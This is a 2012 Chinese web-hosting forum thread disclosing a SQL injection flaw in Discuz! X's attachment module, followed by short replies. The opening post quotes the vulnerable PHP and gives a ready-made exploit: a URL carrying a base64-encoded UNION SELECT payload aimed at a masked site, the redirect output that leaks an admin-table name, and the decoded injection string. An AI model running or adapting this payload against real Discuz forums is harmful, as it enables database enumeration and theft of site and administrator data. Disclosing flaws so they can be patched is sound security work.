全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

IP归属甄别会员请立即修改密码
查看: 1260|回复: 19
打印 上一主题 下一主题

[疑问] 看看这个dzx 小洞

[复制链接]
跳转到指定楼层
1#
发表于 2012-3-12 23:51:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
文件:source\module\forum\forum_attachment.php


if(!defined('IN_DISCUZ')) {
exit('Access Denied');
}
define('NOROBOT', TRUE);
@list($_G['gp_aid'], $_G['gp_k'], $_G['gp_t'], $_G['gp_uid'], $_G['gp_tableid']) = explode('|',

base64_decode($_G['gp_aid']));

if(!empty($_G['gp_findpost']) && ($attach = DB::fetch_first("SELECT pid, tid FROM ".DB::table

('forum_attachment')." WHERE aid='$_G[gp_aid]'"))) {
dheader('location: forum.php?mod=redirect&goto=findpost&pid='.$attach['pid'].'&ptid='.$attach

['tid']);
}

变量aid 直接base64_decode 后传入 SQL查询,造成注射漏洞。。。

http://www.xxxx.net/forum.php?

mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsVEFCTEVfTkFNRSBmcm9tI

ElORk9STUFUSU9OX1NDSEVNQS5UQUJMRVMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCkgYW5kICBUQUJMRV9OQU1FI

Gxpa2UgJyVfbWVtYmVyfHh8eHx4fHg%3D
转向后网址
http://www.xxxx.net/forum.php?

mod=redirect&goto=findpost&pid=1&ptid=pre_common_admincp_member

暴出表名 pre_common_admincp_member

实际查询为:

$x="1' and 1=2 union all select 1,TABLE_NAME from INFORMATION_SCHEMA.TABLES where

TABLE_SCHEMA=database() and TABLE_NAME like '%_member|x|x|x|x";
//die (urlencode(base64_encode($x)));
2#
发表于 2012-3-12 23:52:07 来自手机 | 只看该作者
……小白不懂……
3#
发表于 2012-3-12 23:54:53 | 只看该作者
……小白不懂……
4#
发表于 2012-3-12 23:55:20 | 只看该作者
一步一杀 发表于 2012-3-12 23:54
……小白不懂……

5#
发表于 2012-3-12 23:55:28 | 只看该作者
技术活
6#
发表于 2012-3-12 23:55:46 | 只看该作者
不错 ,惯例 送上美女

7#
发表于 2012-3-12 23:55:50 | 只看该作者
……小白不懂……
8#
发表于 2012-3-12 23:56:23 | 只看该作者
……小白不懂……
9#
发表于 2012-3-13 00:04:42 | 只看该作者
qun来舔
10#
发表于 2012-3-13 00:05:05 | 只看该作者
技术活。楼主别阴我啊
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2025-11-5 07:14 , Processed in 0.064672 second(s), 10 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表